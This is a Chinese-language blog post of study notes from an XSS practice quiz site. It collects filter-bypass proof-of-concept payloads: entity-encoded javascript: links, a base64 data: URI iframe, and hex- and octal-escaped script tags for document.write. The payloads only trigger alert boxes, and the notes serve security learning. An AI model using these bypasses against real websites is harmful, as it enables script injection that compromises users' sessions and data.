文章目录
  1. 1. 笔记
  2. 2. Reference & Dictionary

最近做了一个xss练习.
练习站点: http://xss-quiz.int21h.jp
如果需要练习,请使用firefox或者IE

笔记

  1. test1-2

script标签中可以使用\x \等进制

  1. 一旦<>被实体化之后,XSS就无法绕过

  2. 标签src href属性中可以尝试使用Entity实体编码进行正则绕过
    Chrome的js检测绕过! 火狐存在路径问题

    POC如下

    1
    2
    <a href="jav&#10;ascript:alert('XSS');">xxx</a>
    <a href="jav&#x0D;ascript:alert('XSS');">xxx</a>
  3. 利用iframe的src属性
    iframe可以调用父级 parent.alert(),data协议有个规定,一旦使用很可能会跳转至新的标签页,但是内嵌iframe会相对好一点

    1
    <iframe src="data:text/html;base64,PHNjcmlwdD5wYXJlbnQuYWxlcnQoZG9jdW1lbnQuZG9tYWluKTs8L3NjcmlwdD4"</iframe>
  4. 引号过滤的话就很困难了, 靠其他情况绕过

  5. document.write() 编码绕过
    a.unicode 无需\转义,直接写就行 例: \u003c
    b.16hex & 8hex 需要对\进行转义例如:

    `\\x3cscript\\x3ealert(/xss/)\\x3c\\x2fscript\\x3e`
    `\\74script\\76alert(document.domain)\\74\\57script\\76`
    
  6. JS段中实体编码绕过正则过滤
    Twitter DomXss at Sep 24, 2010

Reference & Dictionary

实体编码表
write up_1
write up_2
write up_3

文章目录
  1. 1. 笔记
  2. 2. Reference & Dictionary